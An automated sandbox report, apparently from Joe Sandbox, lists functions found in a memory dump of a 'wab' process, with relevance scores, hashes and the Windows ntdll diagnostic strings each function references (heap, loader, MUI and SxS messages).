                                                            • Thread identifier, xrefs: 0369553A
                                                            • Critical section address, xrefs: 03695425, 036954BC, 03695534
                                                            • corrupted critical section, xrefs: 036954C2
                                                            • 8, xrefs: 036952E3
                                                            • Address of the debug info found in the active list., xrefs: 036954AE, 036954FA
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 03695543
                                                            • Critical section debug info address, xrefs: 0369541F, 0369552E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            • API String ID: 0-2368682639
                                                            • Opcode ID: ffda5d8d08387730033c070c93b3ac9e7a2d074ddd2f7479bbce99d2d4ebf9ed
                                                            • Instruction ID: b1aa421d6b01370f5bea266554e0907c413e69198bf353346e694e3449dbde4c
                                                            • Opcode Fuzzy Hash: ffda5d8d08387730033c070c93b3ac9e7a2d074ddd2f7479bbce99d2d4ebf9ed
                                                            • Instruction Fuzzy Hash: B981BFB1A00358EFEF24CF94C941BAEBBB9FB49700F14411AF619BB681D375A941CB64
                                                            Function 036D12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                            • API String ID: 0-3591852110
                                                            • Opcode ID: d291e345f0e4adb789c6d8b2f27cb37b4bc726ca3681323c16a6d2bccbfc889c
                                                            • Instruction ID: 2ec7a73873c7b7bd01a0019236344702a75bca5356a400751737b42b05836d28
                                                            • Opcode Fuzzy Hash: d291e345f0e4adb789c6d8b2f27cb37b4bc726ca3681323c16a6d2bccbfc889c
                                                            • Instruction Fuzzy Hash: B312DD74A00642DFD765CF28C545BBABBF5FF0A700F188859E4968B752E7B8E881CB50
                                                            Function 0361D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                            • API String ID: 0-3532704233
                                                            • Opcode ID: 232ada6e872d256b7c249678c7c9ee7f776a4e44de106a7e1b0c28d9bdd60108
                                                            • Instruction ID: 5804924d76d6769d5856d62b91f3dee4f9ee50ae504bc500985c0343f81846f3
                                                            • Opcode Fuzzy Hash: 232ada6e872d256b7c249678c7c9ee7f776a4e44de106a7e1b0c28d9bdd60108
                                                            • Instruction Fuzzy Hash: FCB1AA729183519FC721DF64C980A6FFBE8AB88744F49492EF989DB310D730D919CB92
                                                            Function 036B9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                            • API String ID: 0-3063724069
                                                            • Opcode ID: 0e800a7d46e571947e61af1602a0a19ae85870bf165e8ed4d5b57ca12078ff62
                                                            • Instruction ID: 3323a1476168f5d97ccd913ffee6304284c1655a61277e12843db9cf3d05d59e
                                                            • Opcode Fuzzy Hash: 0e800a7d46e571947e61af1602a0a19ae85870bf165e8ed4d5b57ca12078ff62
                                                            • Instruction Fuzzy Hash: DED1F272808311AFE721DB54C851BABBBF8AF85754F04092DFB849B350E774D9848FA6
                                                            Function 036D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            • API String ID: 0-1700792311
                                                            • Opcode ID: 388830520d5a63ad8ebc799f8d11b2c073b69784756d9f8dde05a91d78971429
                                                            • Instruction ID: adfe7c31430fd9922cd40c6eea46f3f28b8f1f1b81d27a403912406d8bcf283e
                                                            • Opcode Fuzzy Hash: 388830520d5a63ad8ebc799f8d11b2c073b69784756d9f8dde05a91d78971429
                                                            • Instruction Fuzzy Hash: 58D1CB3AA00685DFCB22EF68C540AADFBF1FF4A710F088459E8459B752C774D992CB24
                                                            Function 0361D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0361D0CF
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0361D2C3
                                                            • @, xrefs: 0361D313
                                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0361D196
                                                            • @, xrefs: 0361D2AF
                                                            • @, xrefs: 0361D0FD
                                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0361D262
                                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0361D146
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                            • API String ID: 0-1356375266
                                                            • Opcode ID: ee3aa549c3813af9d0f96952d6c78f974ba796105e3d0539cef128568e16ccae
                                                            • Instruction ID: 8f63a261351ce21d8e100338f3e07702c41196bbb10ca188e84208a330185fb3
                                                            • Opcode Fuzzy Hash: ee3aa549c3813af9d0f96952d6c78f974ba796105e3d0539cef128568e16ccae
                                                            • Instruction Fuzzy Hash: 87A18B719083059FD720CF25C580BAFFBE8BB84759F044D2EFA989A240E774D908CB96
                                                            Function 0361F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-523794902
                                                            • Opcode ID: a0bb57f96deef035484814ad9af6aa42e05b25c0a5ace7bd5d535347ed4817c9
                                                            • Instruction ID: 780245daee7503e57648008cd4f4e7c1f107dc86e1db212482e8dc63237e78ee
                                                            • Opcode Fuzzy Hash: a0bb57f96deef035484814ad9af6aa42e05b25c0a5ace7bd5d535347ed4817c9
                                                            • Instruction Fuzzy Hash: F942FC392083819FC715DF28C580A2AFBE5FF89204F1C4AADE4868F352D734D856CB56
                                                            Function 0363B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                            • API String ID: 0-122214566
                                                            • Opcode ID: 7e73d1eddce77f7246ed3d709e8f5e316e236e5721bb3f0e050a434897b99b88
                                                            • Instruction ID: 91414314718949275dc4170ea245056b057de8f1c882ac8b79109e7bb598df43
                                                            • Opcode Fuzzy Hash: 7e73d1eddce77f7246ed3d709e8f5e316e236e5721bb3f0e050a434897b99b88
                                                            • Instruction Fuzzy Hash: E5C13B71E043159BDB24DB68C880BBEBBA5BF46310F184169E905EF391D7B48945C3A5
                                                            Function 036563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-792281065
                                                            • Opcode ID: 6fdbac7e6b9f6a5a88f96b8bc026f99b1349811af320da9792a7cdc8d1515e52
                                                            • Instruction ID: 7a5522f19fc0e7f99d5328c7378124fe81f536def8aa0cc7902650344ad67e9e
                                                            • Opcode Fuzzy Hash: 6fdbac7e6b9f6a5a88f96b8bc026f99b1349811af320da9792a7cdc8d1515e52
                                                            • Instruction Fuzzy Hash: 6A915A76B003159BEF29DF59D985B6E7BB8BF41B24F04806DE8106F381DB745842CBA4
                                                            Function 03652674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() passed the empty activation context, xrefs: 03692165
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0369219F
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03692178
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 036921BF
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03692180
                                                            • RtlGetAssemblyStorageRoot, xrefs: 03692160, 0369219A, 036921BA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            • API String ID: 0-861424205
                                                            • Opcode ID: 32bfe854171c1d4f2c306db29ae530b393fe411736e248420abe02a741b63b14
                                                            • Instruction ID: 62b9deb4aed5eafc99a3b05b9ebc9d115479f3142e6f21d621e891fbb8e20f64
                                                            • Opcode Fuzzy Hash: 32bfe854171c1d4f2c306db29ae530b393fe411736e248420abe02a741b63b14
                                                            • Instruction Fuzzy Hash: C031E936F402187BFB21DA958C95F5FBA7CDB65A50F090469FA047B241D670EE01C7A1
                                                            Function 036451EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • WindowsExcludedProcs, xrefs: 0364522A
                                                            • Kernel-MUI-Language-SKU, xrefs: 0364542B
                                                            • Kernel-MUI-Language-Allowed, xrefs: 0364527B
                                                            • Kernel-MUI-Number-Allowed, xrefs: 03645247
                                                            • Kernel-MUI-Language-Disallowed, xrefs: 03645352
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                            • API String ID: 0-258546922
                                                            • Opcode ID: ae9279e51a0fb6a89a8ccc2b8716d31a6830a7f0898542f2476f02307edbadd1
                                                            • Instruction ID: 2a1ccaac87f20ed58f8dce89aa3f00a774e5954d81df34e8d46648213c4ce11c
                                                            • Opcode Fuzzy Hash: ae9279e51a0fb6a89a8ccc2b8716d31a6830a7f0898542f2476f02307edbadd1
                                                            • Instruction Fuzzy Hash: 07F15F76D11218EFCB15DF98C9809EEBBF9FF0A650F15416AE502AB310E7749E01CBA4
                                                            Function 0364D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1975516107
                                                            • Opcode ID: 0cc6298d09a21618862ea7b729172f40c1f9ff6eab5d8764d300adc09890f401
                                                            • Instruction ID: 30d8095343d93913f9ec2c1e7fd4d189c8cfae6eb88384f4f80f1fcb8f13f8c2
                                                            • Opcode Fuzzy Hash: 0cc6298d09a21618862ea7b729172f40c1f9ff6eab5d8764d300adc09890f401
                                                            • Instruction Fuzzy Hash: B1510136E00345DFDB14EFA8D5847AEBBB1BF49314F18815DC801AB392D778A881CB80
                                                            Function 036370C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            • API String ID: 0-3178619729
                                                            • Opcode ID: ee1906bb84a7d7dd41539e455f49afa70ef652b18b66b1c6b689687e34467bbf
                                                            • Instruction ID: 5af132dcd71fc1245f8b5742e4df7b98a28ced930757820feb166303a52975b1
                                                            • Opcode Fuzzy Hash: ee1906bb84a7d7dd41539e455f49afa70ef652b18b66b1c6b689687e34467bbf
                                                            • Instruction Fuzzy Hash: 13139DB4A00655DFDB25CF68C5907A9FBF1FF4A304F1881A9E849AB381D734A946CF90
                                                            Function 03631070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-3570731704
                                                            • Opcode ID: 2ea2361489461e3eacee34562b5692f2901b9fbd6fc6c2cd2c36d4426ae01536
                                                            • Instruction ID: 1fc2fcb1ba74e1082d3c0dee75721b193b456ecb60497c5ac6e79041e0889146
                                                            • Opcode Fuzzy Hash: 2ea2361489461e3eacee34562b5692f2901b9fbd6fc6c2cd2c36d4426ae01536
                                                            • Instruction Fuzzy Hash: D0926E75A00368CFEB24EF18C940BA9B7B5BF4A310F0582EAD949AB350D7749E81CF55
                                                            Function 0362A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            • API String ID: 0-379654539
                                                            • Opcode ID: ee297055c7a1854c5c748dc0d15c0831ef1464fe107cdb5ec3c367a159a64a04
                                                            • Instruction ID: 0863e072ee9955b0018bd6e2362a794aa80d16c97fb1473ddec9e57e74083209
                                                            • Opcode Fuzzy Hash: ee297055c7a1854c5c748dc0d15c0831ef1464fe107cdb5ec3c367a159a64a04
                                                            • Instruction Fuzzy Hash: A7C19A741087928FC710DF98C244B6ABBE4BF89704F05496EF8959B350EBB4C94ACF66
                                                            Function 0365273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 036921D9, 036922B1
                                                            • .Local, xrefs: 036528D8
                                                            • SXS: %s() passed the empty activation context, xrefs: 036921DE
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 036922B6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            • API String ID: 0-1239276146
                                                            • Opcode ID: 25658c6b6e990a8b98c4fb16a5787e8544eb22f7091af8f4410d66ce7e837fb6
                                                            • Instruction ID: 2df994722583bafb8ce2eaf673df0681e9d976a4221141ebc4deb7a871f8beca
                                                            • Opcode Fuzzy Hash: 25658c6b6e990a8b98c4fb16a5787e8544eb22f7091af8f4410d66ce7e837fb6
                                                            • Instruction Fuzzy Hash: 9BA1AF3590022D9BDB24CF65D994BA9B3B4BF59314F2809FAEC08AB351D7309E81CF94
                                                            Function 0361F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                            • API String ID: 0-2586055223
                                                            • Opcode ID: 993a60db7f6d0a4d7fb8464e2a6c1f428bf91b71a5dba1012f2ea6ab7fe5c68a
                                                            • Instruction ID: c09d55f651fb4c3d2b0bf5da4b606068a0a3d005501719244be0ad99e4074eac
                                                            • Opcode Fuzzy Hash: 993a60db7f6d0a4d7fb8464e2a6c1f428bf91b71a5dba1012f2ea6ab7fe5c68a
                                                            • Instruction Fuzzy Hash: 5661FF36204780AFD721DB28D944F2BB7E8EF84B14F1809A8E9558F391D735E855CBA1
                                                            Function 036D11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                            • API String ID: 0-336120773
                                                            • Opcode ID: ff9d0f7b831cbbaac6c6b920abb4eacdb3e407109702c2f0333c9b039f6a7312
                                                            • Instruction ID: a20b8d3cc7e5a2e0f10a503fdf08be9a773da7ba6edc1b68c327a6600332fc5d
                                                            • Opcode Fuzzy Hash: ff9d0f7b831cbbaac6c6b920abb4eacdb3e407109702c2f0333c9b039f6a7312
                                                            • Instruction Fuzzy Hash: 9F310635A00600EFD751DBA8C885F6AB3E8FF0A764F180559F451CB261E7B2ED81CA6D
                                                            Function 03619148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                            • API String ID: 0-1391187441
                                                            • Opcode ID: d6df0af017d8176e291e72259a4c1fea8f00dc887d45b51654ba0700c58c6cde
                                                            • Instruction ID: 2ff3b5fe8aae8bb4ec88548e4b4f0228ca6a17b08baf99ce20765b161b9b667a
                                                            • Opcode Fuzzy Hash: d6df0af017d8176e291e72259a4c1fea8f00dc887d45b51654ba0700c58c6cde
                                                            • Instruction Fuzzy Hash: 2A31A436A00204EFCB11DB59C889FAFBBF8FF45760F184565E914AB291D7B0ED81CA60
                                                            Function 036217EC Relevance: 4.3, Strings: 3, Instructions: 520COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HEAP: , xrefs: 0367F8B7
                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 0367F8CC
                                                            • HEAP[%wZ]: , xrefs: 0367F8AA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            • API String ID: 0-3178619729
                                                            • Opcode ID: 1fe9c50e10e002f4ecae9330d42d5a8640cda3c57922b0d93a9093adba6ba1ad
                                                            • Instruction ID: 136e97073e0089168bb8c08ec6f26c7ba1e135182348d6ea35ac8189a358efc6
                                                            • Opcode Fuzzy Hash: 1fe9c50e10e002f4ecae9330d42d5a8640cda3c57922b0d93a9093adba6ba1ad
                                                            • Instruction Fuzzy Hash: 7912A034A08765EFDB24CF25C180B76BBA1BF06704F59859DE89A8F385E774E841CB90
                                                            Function 03630770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-4253913091
                                                            • Opcode ID: 1b8a8c76e845089db18afb763ac2d886a4374adb2556d8094de86ebf9faff125
                                                            • Instruction ID: 1858b4f430c6f8e3344af12504c0dd2a227e526688d57f980339b9f7cd08f6a4
                                                            • Opcode Fuzzy Hash: 1b8a8c76e845089db18afb763ac2d886a4374adb2556d8094de86ebf9faff125
                                                            • Instruction Fuzzy Hash: F1F1CC34A00605DFDB24DF68C994B6AB7F5FF4A304F1882A8E5579B381D734E986CB90
                                                            Function 0362B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                            • API String ID: 0-1145731471
                                                            • Opcode ID: cb9d03e85e1f321d29d4755c31aaa57338e81e3933b94b32516fea928163641c
                                                            • Instruction ID: 331159127ab54dc23c9b331cc8d08c0ca3d25c39cfc42ca70548361e7b0e8d71
                                                            • Opcode Fuzzy Hash: cb9d03e85e1f321d29d4755c31aaa57338e81e3933b94b32516fea928163641c
                                                            • Instruction Fuzzy Hash: 96B1B079A04A148FCB25DF59C980BADBBB5FF48704F298A29E851EB380D734E841CF55
                                                            Function 0361A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            • API String ID: 0-2779062949
                                                            • Opcode ID: e268a25f185fc55d6e5dc11f357d992c938265bcf37322829ce8b21249973a15
                                                            • Instruction ID: a287c05045cd43a71d042a0e14cdb174144ce221dd35c09eecec58a488393284
                                                            • Opcode Fuzzy Hash: e268a25f185fc55d6e5dc11f357d992c938265bcf37322829ce8b21249973a15
                                                            • Instruction Fuzzy Hash: 00A1AB759112289BCB31DF64CD88BEAF7B8EF48710F1401EAE909AB210E7359E84CF54
                                                            Function 036B36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                            • API String ID: 0-318774311
                                                            • Opcode ID: d62f7205fcd8228fda23f6b03dc88f1575fa34c3bcb9fe15ab5b489e008e0a1e
                                                            • Instruction ID: 860e2285b337dd362d54a5764314a0a6bbadd44c3c072a088c9482e44f83d7ca
                                                            • Opcode Fuzzy Hash: d62f7205fcd8228fda23f6b03dc88f1575fa34c3bcb9fe15ab5b489e008e0a1e
